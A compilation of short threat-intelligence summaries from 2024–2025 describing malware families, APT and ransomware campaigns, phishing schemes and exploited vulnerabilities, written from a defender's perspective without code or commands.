VERY IMPORTANT

This intelligence report analyzes common techniques, tactics, and procedures (TTPs) used by threat actors in investment scams, particularly focusing on the abuse of DNS mechanisms. The actors often use registered domain generation algorithms (RDGAs) to create large numbers of domains, embed similar web forms to collect user data, hide activity through traffic distribution systems (TDS), and leverage fake news with celebrity endorsements. The report details two specific actors, Reckless Rabbit and Ruthless Rabbit, examining their distinct RDGA patterns and campaign strategies. It highlights the importance of DNS in detecting and blocking these scams at scale, as actors exploit DNS to build and maintain their infrastructure.

MintsLoader, a malicious loader first observed in 2024, is employed in phishing and drive-by download campaigns to deploy payloads like GhostWeaver, StealC, and modified BOINC clients. It uses obfuscated JavaScript and PowerShell scripts in a multi-stage infection chain, featuring sandbox evasion techniques, a domain generation algorithm, and HTTP-based C2 communications. Various threat groups, including TAG-124 and SocGholish operators, utilize MintsLoader to target industrial, legal, and energy sectors. The loader's sophisticated obfuscation and evasion methods complicate detection, but Recorded Future's Malware Intelligence Hunting provides up-to-date information on new samples and C2 domains.

A recent incident response case in Brazil revealed a Perl-based crypto mining botnet called Outlaw, also known as Dota, targeting Linux environments. The threat actor exploits weak SSH credentials, downloads malicious scripts, and deploys an XMRig miner for Monero cryptocurrency. The botnet includes an IRC-based client that acts as a backdoor, allowing for various malicious activities. Victims have been identified mainly in the United States, with additional targets in Germany, Italy, Thailand, Singapore, Taiwan, Canada, and Brazil. The article provides detailed analysis of the malware's components, persistence mechanisms, and evasion techniques. Recommendations for system administrators include hardening SSH configurations and implementing additional security measures to mitigate the risk of compromise.

A new information-stealing malware called Gremlin Stealer, written in C#, has been identified by researchers. Advertised on Telegram since March 2025, it targets a wide range of data including browser information, crypto wallets, FTP and VPN credentials. The malware exfiltrates stolen data to a web server for publication. It can bypass Chrome's cookie V20 protection and supports various Chromium and Gecko-based browsers. Gremlin Stealer also targets cryptocurrency wallets, Telegram and Discord sessions, and system information. The stolen data is compressed into a ZIP archive and sent to the attacker's server using a Telegram bot. This evolving threat highlights the need for robust cybersecurity measures to protect against such information stealers.

A new financially motivated business email compromise (BEC) threat actor, TA2900, has been identified targeting individuals in France and occasionally Canada. The actor sends French language emails using rental payment themes, claiming that rental installments have not been received and instructing recipients to send payments to new bank accounts. The campaigns use compromised mailboxes from educational institutions and often include PDF attachments with logos related to property management. The actor frequently changes the International Bank Account Numbers (IBAN) provided, using accounts from French banks. The messages may be generated with AI assistance and are designed to create anxiety and prompt immediate action from recipients.

Senior members of the World Uyghur Congress (WUC) were targeted by a sophisticated spear phishing campaign aimed at deploying surveillance malware. The attack, discovered in March 2025, involved a trojanized version of a legitimate Uyghur language text editor. The malware enabled remote surveillance, collecting system information and allowing file manipulation. The campaign's infrastructure consisted of two distinct command-and-control clusters, with domains impersonating the legitimate tool's developer. While not technically advanced, the operation demonstrated a deep understanding of the Uyghur community and likely aligns with Chinese government interests. The targeting of exiled Uyghur representatives highlights the ongoing cyber threats faced by diaspora groups.

An increase in malicious emails impersonating US Customs and Border Protection has been observed, targeting individuals with fake Electronic System for Travel Authorization (ESTA) applications. These well-crafted emails exploit uncertainty around immigration services, urging recipients to submit new applications. The scam involves a convincing replica of the ESTA portal, collecting personal and financial information. Victims are redirected to a payment gateway, charging $88 instead of the legitimate $21 fee. The scam risks identity theft, blackmail, and financial fraud. Users are advised to verify sender addresses, inspect URLs, and access the official ESTA website directly to avoid falling victim to this sophisticated phishing scheme.

A sophisticated cyber-attack campaign has been identified, combining phishing techniques targeting Office365 credentials with malware delivery. The attackers use a file deletion reminder as a pretext, exploiting a legitimate file-sharing service to appear more credible. Upon opening a shared PDF file, users are presented with two hyperlinks: 'Preview' leads to a fake Microsoft login page for credential theft, while 'Download' initiates the installation of ConnectWise RAT malware. The malware establishes persistence through system services and registry modifications. This dual-threat approach emphasizes the need for user vigilance and education in recognizing phishing attempts and suspicious emails.

SMS-based phishing attacks, known as smishing, are on the rise, targeting businesses with sophisticated social engineering tactics. These attacks often begin with urgent text messages containing disguised links, redirecting victims to fake login pages. Attackers exploit human emotions and create a false sense of security by using legitimate domains like Google as intermediaries. The process typically involves a deceptive SMS, followed by redirects to a phishing page impersonating trusted platforms like ServiceNow. Victims are then prompted to enter login credentials and fake multifactor authentication, potentially leading to unauthorized access and data breaches. The report emphasizes the importance of employee education and vigilance in recognizing and preventing these evolving threats.

This analysis delves into four sophisticated phishing techniques observed in 2025. These include embedding Base64-encoded JavaScript in SVG files, hiding malicious URLs in PDF annotations, using OneDrive links to deliver dynamic phishing content, and nesting MHT files within OpenXML documents. These methods successfully evaded email protections and reached intended victims, demonstrating the increasing sophistication of threat actors. The techniques exploit unconventional file formats, cloud-based platforms, and structural obfuscation to bypass traditional security measures. The findings emphasize the need for improved detection mechanisms, deeper inspection of file structures, and advanced context-aware parsing in email and document security tools.

The article discusses a malware called DslogdRAT, which was installed on Ivanti Connect Secure systems by exploiting CVE-2025-0282. The malware communicates with a C2 server during business hours to avoid detection. It uses a web shell for initial access and supports various commands for file operations, shell execution, and proxy functionality. The article details the malware's execution flow, configuration data, and communication method. Additionally, SPAWNSNARE malware was found on the same compromised systems. The attacks are potentially linked to the UNC5221 threat group, and organizations are advised to monitor for ongoing threats targeting Ivanti Connect Secure vulnerabilities.

A critical vulnerability in SAP NetWeaver Visual Composer, identified as CVE-2025-31324 with a severity score of 10, allows unauthorized file uploads and execution of malicious files. Initially suspected as a remote file inclusion issue, it was confirmed to be an unrestricted file upload vulnerability. Attackers exploited this vulnerability to upload JSP webshells, gaining remote control and executing arbitrary commands. The exploitation involved abusing the /developmentserver/metadatauploader endpoint. Attackers used sophisticated tools like Brute Ratel and the Heaven's Gate technique for command-and-control and evasion. SAP released a patch to address this vulnerability, which is strongly recommended to be applied immediately.

This analysis details a spearphishing campaign targeting senior members of the World Uyghur Congress (WUC) in March 2025. The attackers used a trojanized version of a legitimate Uyghur language text editor to deliver Windows-based malware for remote surveillance. While not technically advanced, the malware delivery was well-customized to reach the Uyghur community. This incident is part of a broader pattern of digital transnational repression against Uyghur diaspora by actors likely aligned with the Chinese government. The malware profiled systems, sent information to remote servers, and could load additional malicious plugins. The campaign demonstrates the ongoing digital threats facing exiled Uyghur communities and the exploitation of software meant to support marginalized cultures.

An open directory linked to a Fog ransomware affiliate was discovered, containing tools for reconnaissance, exploitation, lateral movement, and persistence. Initial access was gained through compromised SonicWall VPN credentials, while other tools facilitated credential theft and exploitation of Active Directory vulnerabilities. Persistence was maintained via AnyDesk, automated by a PowerShell script. Sliver C2 executables were used for command-and-control operations. The victims spanned multiple industries across Europe, North America, and South America, highlighting the affiliate's broad targeting scope. The toolkit included SonicWall Scanner, DonPAPI, Certipy, Zer0dump, and Pachine/noPac for various attack stages.

The Hannibal Stealer is a sophisticated information-stealing malware, rebranded from Sharp and TX stealers. Developed in C#, it targets Chromium and Gecko-based browsers, extracting sensitive data while bypassing Chrome Cookie V20 protection. Its capabilities extend to cryptocurrency wallets, FTP clients, VPN credentials, and various system information. The malware includes a crypto clipper module and is controlled via a dedicated C2 panel. Sold on dark web forums, it employs geofencing, domain-matching, and comprehensive system profiling. The threat actor behind Hannibal Stealer has been linked to previous iterations, indicating minimal innovation beyond rebranding and updated communication methods. Active Telegram channels and control panels suggest ongoing operations and infrastructure maintenance.

Pharmaceutical-themed spam campaigns continue to target individuals and organizations, particularly in the healthcare and pharmaceutical sectors. Recent observations reveal a bulk spam campaign using spoofed identities and compromised infrastructure to send deceptive emails. The attackers employ tactics such as domain spoofing, DKIM signature manipulation, and the use of compromised servers running malicious PHP scripts. The emails contain links that redirect users to fraudulent websites posing as legitimate Canadian pharmacies, often including a fake security verification step. These campaigns aim to trick recipients into revealing sensitive information or potentially installing malware. The persistence of pharmacy-themed spam highlights the need for continued vigilance and awareness of common scam tactics.

This article discusses the analysis of a PNG file containing hidden malicious content using the pngdump.py tool. The image, 31744 pixels wide and 1 pixel high, was found to have a PE file embedded in its pixel data. The author demonstrates how to extract the hidden file using various Python tools and techniques, including slicing the raw pixel data to isolate the second channel where the malware was concealed. The extracted PE file, identified as a .NET executable, had 49 detections on VirusTotal, while the original PNG file had none, showcasing the effectiveness of this steganography technique in evading detection.

A sophisticated multi-stage carding attack on a Magento eCommerce website has been uncovered. The malware used a fake gif image file, local browser sessionStorage data, and a malicious reverse-proxy server to steal credit card data, login details, cookies, and other sensitive information. The attack targeted an outdated Magento 1.9.2.4 installation, exploiting its lack of support and security vulnerabilities. The malware injected JavaScript code disguised as Bing tracking code and utilized a tampered payment file to create a user-specific attack. This advanced technique allowed the attackers to intercept and manipulate all website traffic while remaining undetected by victims and administrators.

Salt Typhoon, a Chinese state-sponsored threat actor, has been targeting major telecommunications providers worldwide by exploiting vulnerabilities in network devices. This analysis tracks global exposures of internet-facing devices associated with Salt Typhoon activity over six months, including Sophos Firewalls, Cisco IOS XE WebUIs, Ivanti Connect Secure, and Fortinet FortiClient EMS systems. Overall combined exposure decreased by 25%, with Sophos Firewall interfaces showing the largest reduction. Cisco IOS XE was the only platform with increased exposure. Geographically, most exposures remain concentrated in the United States, except for Sophos XG Firewall exposures in Germany. The persistence of exposed devices raises questions about remediation efforts and organizational responses to these threats.

Kaspersky researchers have discovered a new version of the Triada Trojan being distributed through infected Android device firmware. The malware is embedded into system files before devices are sold, making it nearly impossible to remove. It infects the Zygote process to compromise all apps on the device. The Trojan's modular architecture allows attackers to deliver targeted payloads for stealing cryptocurrency, credentials, and other sensitive data from popular apps like WhatsApp, Facebook, and banking apps. It can also intercept SMS messages, make calls, and act as a reverse proxy. Over 4,500 infected devices have been detected worldwide, with the highest numbers in Russia, UK, Netherlands, Germany and Brazil. The attackers have stolen over $264,000 in cryptocurrency so far.

This article draws parallels between the popular TV show Ted Lasso and the cybersecurity industry, emphasizing the importance of intellectual curiosity in the field. The author, William Largent, discusses his approach to interviewing candidates for Talos, focusing on their innate curiosity rather than specific skillsets. The piece also covers recent cybersecurity news, including Cisco Talos' blog post on the initial access broker 'ToyMaker' and their custom backdoor 'LAGTOY'. Additionally, it highlights several security headlines, such as Apple's zero-day bug fixes and Microsoft's efforts to purge inactive Azure cloud tenants. The article concludes with information on upcoming events and prevalent malware files detected by Talos.

North Korean cybercrime activities heavily rely on Russian IP ranges in Khasan and Khabarovsk, utilizing extensive anonymization networks. The Void Dokkaebi group, linked to North Korea, employs fictitious companies like BlockNovas to target IT professionals through fraudulent job interviews, aiming to steal cryptocurrency and potentially engage in espionage. Their tactics involve using VPNs, proxies, and RDP connections to obscure their origins. Instruction videos suggest the involvement of less-skilled foreign conspirators. The primary focus remains cryptocurrency theft, but there's potential for expanded espionage activities and possible cooperation between North Korean and Russian entities.

A scam campaign dubbed 'Power Parasites' is targeting individuals in Asian countries through deceptive websites, social media groups, and Telegram channels. The campaign exploits the names and branding of global energy companies and other major brands to conduct job and investment scams. Victims are primarily located in Bangladesh, Nepal, and India. The operation uses over 150 domains, impersonating companies such as Siemens Energy, Schneider Electric, EDF Energy, Repsol S.A., and Suncor Energy. The scammers employ a combination of fake job offers and fraudulent investment platforms, often requesting personal and financial information from victims. The campaign remains active and continues to evolve, targeting additional prominent brands across various industries.

This analysis explores a sophisticated malware campaign utilizing SnakeKeylogger, a credential-stealing threat. The attack begins with malicious spam emails containing disguised attachments. The infection chain involves multiple stages, including encrypted payload delivery, process hollowing, and stealthy execution. SnakeKeylogger targets various applications to harvest sensitive data, including web browsers, email clients, and FTP software. The malware employs advanced evasion techniques such as obfuscation and memory injection. It specifically targets Microsoft Outlook profiles and Wi-Fi credentials. The campaign demonstrates a structured approach with regular payload updates and abuse of legitimate servers for distribution. This threat poses significant risks for data theft and potential business email compromise.

The Lazarus group has launched a sophisticated attack campaign dubbed 'Operation SyncHole' targeting South Korean organizations. The operation combines watering hole attacks with exploitation of vulnerabilities in South Korean software. At least six organizations in the software, IT, financial, semiconductor manufacturing, and telecommunications industries were compromised. The attackers utilized updated versions of known Lazarus malware tools, including ThreatNeedle, wAgent, and COPPERHEDGE. They also exploited vulnerabilities in Cross EX and Innorix Agent software for initial access and lateral movement. The campaign demonstrates Lazarus' ongoing focus on supply chain attacks targeting South Korean entities and their deep understanding of the local software ecosystem.

The initial access broker (IAB), whom Talos calls “ToyMaker” and assesses with medium confidence is a financially motivated threat actor, exploits vulnerable systems exposed to the internet. They deploy their custom-made backdoor we call “LAGTOY” and extract credentials from the victim enterprise. LAGTOY can be used to create reverse shells and execute commands on infected endpoints.

Chinese cybercriminals are exploiting NFC technologies for fraudulent purposes, targeting financial institutions and consumers worldwide. They use sophisticated tools like Z-NFC and King NFC to facilitate illegal transactions at scale. The fraudsters leverage Host Card Emulation (HCE) to mimic physical NFC smart cards and create 'farms' of mobile devices to automate fraud. They target countries including the US, UK, EU, Australia, Canada, and others. The criminals also abuse NFC-enabled POS terminals and exploit loyalty points programs. This growing threat has led to significant financial losses and poses serious risks to payment security and digital identity systems globally.

SvcStealer 2025 is a novel information stealer delivered through spear phishing email attachments. It harvests sensitive data including machine information, installed software, user credentials, cryptocurrency wallets, and browser data. The malware creates a unique folder, terminates specific processes, and collects data from various sources. It compresses the gathered information, establishes a connection with a C2 server, and uploads the data. The malware can also capture screenshots and potentially download additional payloads. It employs evasion techniques by deleting traces and ensuring only one instance runs on the victim's machine. The threat actors behind SvcStealer could potentially act as initial access brokers, selling the gathered information on underground forums and criminal marketplaces.

Between November 2024 and April 2025, a set of domains and servers impersonating an Iraqi academic organization and fictitious UK tech firms were tracked. The infrastructure, while dormant, exhibited characteristics similar to APT34 (OilRig), including shared SSH keys, structured websites, and decoy HTTP behavior on M247-hosted servers. Key observations include the use of port 8080 for fake 404 responses, consistent SSH fingerprint reuse, and domains registered through P.D.R. Solutions with regway.com nameservers. The setup suggests deliberate pre-operational staging, offering defenders an early warning opportunity. Detection strategies include monitoring SSH fingerprints, HTTP response patterns, and domain registration behaviors.

A sophisticated backdoor targeting Russian organizations in government, finance, and industry sectors was discovered masquerading as updates for ViPNet secure networking software. The malware, distributed in LZH archives, exploits a path substitution technique to execute a malicious loader that deploys a versatile backdoor. This backdoor can connect to a C2 server, steal files, and launch additional malicious components. The attack highlights the increasing complexity of APT group tactics and emphasizes the need for multi-layered security defenses to protect against such sophisticated threats.

A new operation named Larva-24005, linked to the Kimsuky group, has been discovered by ASEC. The threat actors exploited RDP vulnerabilities to infiltrate systems, installing MySpy malware and RDPWrap for continuous remote access. They also deployed keyloggers to record user inputs. The group has been targeting South Korea's software, energy, and financial industries since October 2023, with attacks extending to multiple countries worldwide. Their methods include exploiting the BlueKeep vulnerability (CVE-2019-0708) and using phishing emails. The attackers employ various tools such as RDP scanners, droppers, and keyloggers in their multi-stage attack process.

A series of attacks targeting poorly managed MS-SQL servers have been identified, involving the installation of Ammyy Admin, a remote control tool. The attackers exploit vulnerable servers, execute commands to gather system information, and use WGet to install additional malware. The installed malware includes Ammyy Admin (mscorsvw.exe), its settings file (settings3.bin), and PetitPotato (p.ax). The attackers utilize an old version of Ammyy Admin (v3.10) and employ known exploitation methods to gain remote control. They also use PetitPotato for privilege escalation, adding new users and activating RDP services. To prevent such attacks, administrators are advised to use strong passwords, update software regularly, and implement security measures like firewalls.

This intelligence document provides a list of Indicators of Compromise (IoCs) associated with the DOGE Binary Loader. It includes several malicious URLs hosted on the domain 'hilarious-trifle-d9182e.netlify.app' along with their corresponding SHA-256 hashes. The listed files include PowerShell scripts ('lootsubmit.ps1' and 'trackerjacker.ps1'), a PNG image ('qrcode.png'), and an executable ('ktool.exe'). These IoCs are crucial for identifying and mitigating potential infections related to the DOGE Binary Loader malware campaign.

A phishing campaign delivering a malicious Word document exploiting CVE-2017-11882 was observed spreading a new FormBook variant. The campaign tricks recipients into opening an attached document, which extracts a 64-bit DLL file and exploits the vulnerability to execute it. The DLL acts as a downloader and installer for FormBook, establishing persistence and downloading an encrypted payload disguised as a PNG file. The payload is decrypted and injected into a legitimate process using process hollowing techniques. This fileless variant of FormBook aims to evade detection by keeping the malware entirely in memory. The analysis covers the initial phishing email, exploitation process, payload download and decryption, and the sophisticated injection techniques used to deploy FormBook.

A sophisticated backdoor targeting Russian organizations in government, finance, and industrial sectors has been discovered. The malware masquerades as updates for ViPNet, a secure networking software suite. It is distributed via LZH archives containing legitimate and malicious files. The backdoor exploits a path substitution technique to execute a malicious loader, which then decrypts and loads a versatile payload capable of connecting to a C2 server, stealing files, and launching additional malicious components. The complexity of this attack highlights the need for multi-layered security measures to protect against advanced persistent threats.

PE32 Ransomware is a new strain of malware that utilizes Telegram for command and control. Despite its amateur execution, it effectively encrypts files and causes significant damage. The ransomware features a unique two-tiered payment model, demanding one fee to unlock files and another to prevent data leaks. It communicates entirely via Telegram Bot API, with the bot token exposed in the code. PE32 is characterized by its messy and loud behavior, dropping marker files, triggering disk repairs, and encrypting even useless files. While lacking sophisticated evasion techniques, it poses a real threat due to its fast encryption process and the current state of poor security hygiene among potential victims. The malware's reliance on basic Windows libraries and its chaotic codebase make it both easy to analyze and potentially dangerous.

This analysis examines a complex multi-stage attack exploiting a resilient network infrastructure known as 'Cloudflare tunnel infrastructure to deliver multiple RATs' since February 2024. The infection chain involves multiple steps, including phishing emails with malicious attachments, execution of various file types (LNK, HTA, BAT, Python scripts), and eventual delivery of AsyncRAT. The attackers employ various evasion techniques and leverage public services like TryCloudflare and DynDNS. The report highlights the importance of combining cyber threat intelligence with detection rules to enhance security capabilities against evolving threats. It also provides detailed information on the attack stages, detection opportunities, and associated indicators of compromise.

Lumma Stealer, a sophisticated information-stealing malware, has gained prominence in cybercriminal circles since 2022. It employs various distribution methods, with fake CAPTCHA pages being a notable vector. These pages mimic legitimate services and trick users into executing malicious commands. The malware uses complex infection chains involving PowerShell scripts, JavaScript, and AutoIt components to evade detection. Once installed, Lumma Stealer targets a wide range of sensitive data, including cryptocurrency wallets, browser credentials, and financial information. The malware's stealthy execution and anti-analysis techniques make it a significant threat to both individuals and organizations.

In 2025, a phishing email containing a malicious link redirected through Google Ads was received by the Internet Storm Center. The link led to a credential-stealing page hosted on a dynamic DNS service. Despite being clearly fraudulent and detected by VirusTotal, the ad redirect remained active for over a week. The article questions why major ad providers like Google aren't implementing basic security measures to prevent such obvious threats. It suggests that ad companies should filter out links to domains unsuitable for legitimate ads and regularly check landing pages for malicious content. The author argues that this should be the minimum expected from ad providers in 2025, especially given the availability of AI and tools like VirusTotal for threat detection.

This analysis explores how scammers capitalize on financial stress by promising 'free money' through fake subsidy programs, government grants, or relief cards. Common tactics include using urgency, exclusivity, and fabricated social proof to manipulate victims. Scammers employ various techniques such as phishing, impersonation, fake customer support, QR code scams, and malware-laden attachments to collect personal data for identity theft or future scams. The article provides red flags to watch for, including vague claims, lack of contact information, and unrealistic promises. To protect against these scams, individuals should verify sources, avoid sharing personal information on unverified websites, report suspicious sites, and educate others about these fraudulent schemes.

This intelligence report analyzes the similarities between two previously separate APT groups, Team46 and TaxOff, concluding they are likely the same entity. The analysis covers their shared tactics, techniques, and procedures, including similar PowerShell commands, loader functionality, and infrastructure patterns. Key findings include the use of zero-day exploits, complex malware development, and long-term persistence strategies. The report details the groups' use of multi-layered encryption in their loaders, custom obfuscation techniques, and various malware tools like Trinper backdoor and Cobalt Strike. The combined group, now referred to as Team46, demonstrates sophisticated capabilities in targeted attacks against protected infrastructures.

A new Android malware campaign called 'SuperCard X' has been identified, employing NFC-relay techniques to enable fraudulent POS payments and ATM withdrawals. Distributed through a Chinese-speaking Malware-as-a-Service platform, it shares similarities with NGate malware. The campaign uses social engineering tactics to trick victims into installing the malicious app and tapping their payment cards on infected phones. This sophisticated fraud scheme combines SMS phishing, phone calls, malware installation, and NFC data interception. SuperCard X poses a significant financial risk to banking institutions, payment providers, and credit card issuers due to its ability to perform instant fraudulent cash-outs with debit and credit cards.

This intelligence briefing focuses on malware campaigns linked to Proton66, particularly those targeting Android devices through compromised WordPress websites. It details how these sites were injected with malicious scripts to redirect Android users to fake Google Play Store pages. The report also covers the XWorm campaign targeting Korean-speaking users, the Strela Stealer targeting German-speaking countries, and the WeaXor ransomware. The analysis provides insights into the infection chains, malware configurations, and command-and-control servers used in these campaigns. Additionally, it offers recommendations for blocking associated IP ranges and lists numerous indicators of compromise (IOCs) for each campaign.

This report discusses the importance of being mindful of the information shared online, particularly when using search engines and AI-powered tools. It highlights the risks associated with sharing personal data and preferences, which can be stored and used for advertising or other purposes. The author recommends using privacy-focused search engines like SearXNG and cautions against oversharing with AI language models. The report also touches on ransomware trends, emphasizing the need for basic cyber hygiene practices like software updates and credential protection. Additionally, it covers recent security headlines, including concerns about OpenAI's reduced safety testing and the potential risks of AI-hallucinated code dependencies.

A server linked to KeyPlug malware briefly exposed tooling used in active operations. The infrastructure, live for less than a day, revealed Fortinet firewall and VPN exploit scripts, a PHP webshell, and network reconnaissance tools targeting authentication and internal portals of a major Japanese company. The exposed directory provided insight into the attacker's workflow, from infrastructure reconnaissance to post-access session management. Notable files included Fortinet reconnaissance scripts, CDN fingerprinting tools, and encrypted command execution utilities. The server's brief exposure offers a rare glimpse into the operational staging and planning of a likely advanced adversary.

A deceptive HWP document, masquerading as a reunification education support application, was discovered on March 5. The document, when opened, creates multiple files in the TEMP folder, including a malicious BAT file. This BAT file executes various actions to ensure persistent malware operation, including registering task schedulers and executing additional malicious files. The malware ultimately accesses an external URL to download and execute additional files, allowing threat actors to execute various commands. This incident is part of a recent trend of malware distribution using HWP documents, with attacks now targeting the general public rather than specific users. Users are advised to be cautious and keep their security software updated.

A newly discovered malware utilizes JPHP, a PHP interpreter running on Java Virtual Machine, to create a downloader. The malware is distributed in a ZIP file containing Java Runtime Environment and libraries, enabling execution without a separate Java environment. It communicates with a C2 server, disables Windows Defender's behavior monitoring, and uses Telegram for additional C2 connections. The malware can download and execute additional payloads, potentially including data breach-type malware like Strrat and Danabot. This case highlights how threat actors exploit lesser-known technologies like JPHP for malware distribution, emphasizing the importance of scrutinizing executable files and scripts from various sources.

Multiple state-sponsored threat actors from North Korea, Iran, and Russia have been observed adopting the ClickFix social engineering technique, previously associated with cybercriminal activities. Over a three-month period from late 2024 to early 2025, groups such as TA427, TA450, UNK_RemoteRogue, and TA422 incorporated ClickFix into their existing infection chains. The technique involves using dialogue boxes with instructions for targets to copy, paste, and run malicious commands on their machines. While the adoption of ClickFix hasn't revolutionized these groups' campaigns, it has replaced installation and execution stages in their existing processes. This trend highlights the fluidity of tactics among threat actors and the potential for wider adoption of ClickFix by other state-sponsored groups in the future.

A new version of the MysterySnail RAT, attributed to the Chinese-speaking IronHusky APT group, has been detected targeting government organizations in Mongolia and Russia. The malware, which hadn't been publicly reported since 2021, now features a modular architecture with five additional DLL modules for command execution. A lightweight version dubbed MysteryMonoSnail was also observed. The infection chain involves a malicious MMC script, an intermediary backdoor, and the main MysterySnail RAT payload. The attackers use public file storage and the piping-server project for command and control. This case highlights the importance of maintaining vigilance against seemingly obsolete malware families, as they may continue operating undetected for extended periods.

The XorDDoS trojan, a DDoS malware targeting Linux machines, continues to spread globally with over 70% of attacks targeting the United States from Nov 2023 to Feb 2025. The operators are believed to be Chinese-speaking individuals based on language settings. A new 'VIP version' of the XorDDoS controller and central controller have been discovered, enabling more sophisticated and widespread attacks. The malware uses SSH brute-force attacks to gain access and implements persistence mechanisms. A new central controller allows threat actors to manage multiple sub-controllers simultaneously, enhancing attack coordination. The infection chain, decryption methods, and network communication patterns between the trojan, sub-controller, and central controller are analyzed in detail.

A critical vulnerability, CVE-2025-24054, related to NTLM hash disclosure via spoofing, has been actively exploited since March 19, 2025. The flaw allows attackers to leak NTLM hashes or user passwords using a maliciously crafted .library-ms file, potentially compromising systems. A campaign targeting government and private institutions in Poland and Romania used malspam to distribute Dropbox links containing archives exploiting this vulnerability. The exploit can be triggered with minimal user interaction, such as right-clicking or navigating to the folder containing the malicious file. This vulnerability appears to be a variant of the previously patched CVE-2024-43451, sharing several similarities.

A multi-layered attack chain was uncovered in December 2024, employing distinct stages to deliver malware like Agent Tesla variants, Remcos RAT, or XLoader. The campaign uses phishing emails posing as order release requests with malicious attachments. The attack chain leverages multiple execution paths, including .NET and AutoIt compiled executables, to evade detection and complicate analysis. The final payload is typically an Agent Tesla variant, a well-known infostealer. This approach demonstrates how attackers are increasingly relying on complex delivery mechanisms to bypass traditional sandboxes and ensure successful payload execution. Despite the multi-layered approach, Advanced WildFire effectively detects each stage, providing better protection for customers.

Mustang Panda, a threat actor group, has developed new tools including two keyloggers (PAKLOG and CorKLOG) and an EDR evasion driver (SplatCloak). PAKLOG monitors keystrokes and clipboard data, using a custom encoding scheme. CorKLOG captures keystrokes, encrypts data with RC4, and establishes persistence through services or scheduled tasks. SplatCloak disables kernel-level notification callbacks for Windows Defender and Kaspersky drivers, employing obfuscation techniques like control flow flattening and mixed boolean arithmetic. Along with those tools, the group has been observed using updated versions of ToneShell and a new tool called StarProxy. ToneShell, a backdoor, now features changes in its FakeTLS C2 communication protocol and client identifier storage methods. StarProxy, a lateral movement tool, uses the FakeTLS protocol to proxy traffic and facilitate attacker communications.

Chinese state-sponsored threat actor UNC5174 has launched a new campaign using SNOWLIGHT malware and VShell, a Remote Access Trojan. The campaign targets Linux systems, employing domain squatting for phishing and social engineering. SNOWLIGHT acts as a dropper for VShell, which resides in memory as a fileless payload. The attackers use WebSockets for command and control communication, enhancing stealth. UNC5174's motivations include espionage and access brokering. The campaign has been active since November 2024, demonstrating sophisticated techniques such as memory manipulation and defense evasion. This development highlights the threat actor's expanding arsenal and continued support for Chinese government operations.

Black Basta, a ransomware-as-a-service group, has been using an automated brute forcing framework called BRUTED to target edge network devices since 2023. The framework performs internet scanning and credential stuffing against firewalls and VPN solutions in corporate networks. Black Basta prioritizes high-impact industries, particularly the Business Services sector, to amplify operational disruptions. The group's internal communications were leaked, exposing their infrastructure and operational details. BRUTED targets various remote-access and VPN solutions, using proxy rotation, credential generation, and distributed execution to scale attacks. Black Basta exploits vulnerabilities in edge devices for initial access, then targets ESXi hypervisors to encrypt file systems and disrupt virtual machines, maximizing operational impact and ransom leverage.

This analysis examines BRICKSTORM, an espionage backdoor linked to China-nexus cluster UNC5221. It details newly identified Windows variants, expanding on previous Linux presence. The backdoor, used in long-term espionage campaigns, targets European industries of strategic interest to China. BRICKSTORM provides file management and network tunneling capabilities, using multiple layers of encryption and leveraging cloud providers to evade detection. The analysis covers the backdoor's inner workings, including its command and control infrastructure, protocol details, and evasion techniques. It highlights the persistent nature of these intrusions and the challenges they pose to defensive measures. The document concludes with recommendations for detection and mitigation strategies.

A malicious PyPI package named ccxt-mexc-futures has been discovered by security researchers. This package claims to extend the capabilities of the legitimate CCXT library for cryptocurrency trading, specifically for futures trading on the MEXC exchange. However, it actually hijacks user orders and steals crypto tokens. The package overrides certain API functions, redirecting trading requests to a malicious server at greentreeone.com instead of the legitimate MEXC platform. It uses obfuscation techniques to hide its malicious code and tricks users into believing their orders are being processed normally. The attackers can potentially steal API keys, secrets, and other sensitive information used for crypto trading. Users are advised to revoke any compromised tokens and remove the malicious package immediately.

The Interlock ransomware group, active since September 2024, has shown adaptability and innovation in its tactics despite a relatively low victim count. They employ fake browser updates and the ClickFix technique for initial access, followed by a multi-stage attack chain involving PowerShell backdoors, credential stealers, and a custom Remote Access Trojan. The group targets various sectors across North America and Europe, conducting Big Game Hunting and double extortion campaigns. Interlock has been observed improving their tools, including evolving their PowerShell backdoor and modifying their ransom notes to emphasize legal repercussions. The group's focus on maintaining relevance while avoiding large-scale visibility suggests a strategic approach to their operations.

The CrazyHunter ransomware group has emerged as a significant threat, specifically targeting Taiwanese organizations in healthcare, education, and industrial sectors. The group employs sophisticated techniques, including the Bring Your Own Vulnerable Driver (BYOVD) method, to bypass security measures. They have expanded their toolkit by integrating open-source tools from GitHub, such as the Prince Ransomware Builder and ZammoCide. Approximately 80% of CrazyHunter's toolkit consists of open-source tools. The group's focus on Taiwan's critical sectors raises concerns about potential disruptions to essential services. Their evolving tactics and use of readily available tools highlight the need for enhanced cybersecurity measures to counter this emerging threat.

This analysis examines a sophisticated malware loader that utilizes JScript to launch obfuscated PowerShell code, ultimately delivering payloads such as XWorm and Rhadamanthys. The loader employs geofencing tactics, targeting victims in the United States with XWorm RAT, while deploying Rhadamanthys stealer to users outside the U.S. The attack chain involves multiple stages of obfuscation and deobfuscation, including decimal encoding and string manipulation. The final payload is injected into RegSvcs.exe using reflective loading techniques. The loader also performs various cleanup actions to evade detection and remove traces of its activity. Both XWorm and Rhadamanthys are advanced malware variants with capabilities ranging from DDoS attacks to cryptocurrency theft.

This analysis explores an ongoing phishing campaign targeting employee and member portals using a PHP-based phishing kit. The campaign has evolved from using client-side redirects to server-side credential validation, making detection more challenging. Multiple domains impersonating corporate login portals were identified, hosted on infrastructure linked to Chang Way Technologies Co. Limited. The phishing pages employ sophisticated tactics, including two-factor authentication bypasses and decoy content. The campaign's infrastructure and techniques suggest a persistent, possibly state-linked threat actor adapting their methods to evade detection and maintain access to enterprise environments.

A sophisticated malware campaign exploits users' trust in online file conversion tools by impersonating the legitimate service pdfcandy.com. The attack involves fake PDF-to-DOCX converters that trick victims into executing a malicious PowerShell command, leading to the installation of Arechclient2, a variant of the SectopRAT information stealer. This malware is capable of harvesting sensitive data, including browser credentials and cryptocurrency wallet information. The attackers use deceptive tactics such as simulated processing, fake CAPTCHA prompts, and psychological manipulation to lower users' guards. The malware delivery process involves a complex redirection chain, ultimately leading to the download of a malicious payload disguised as 'adobe.zip'.

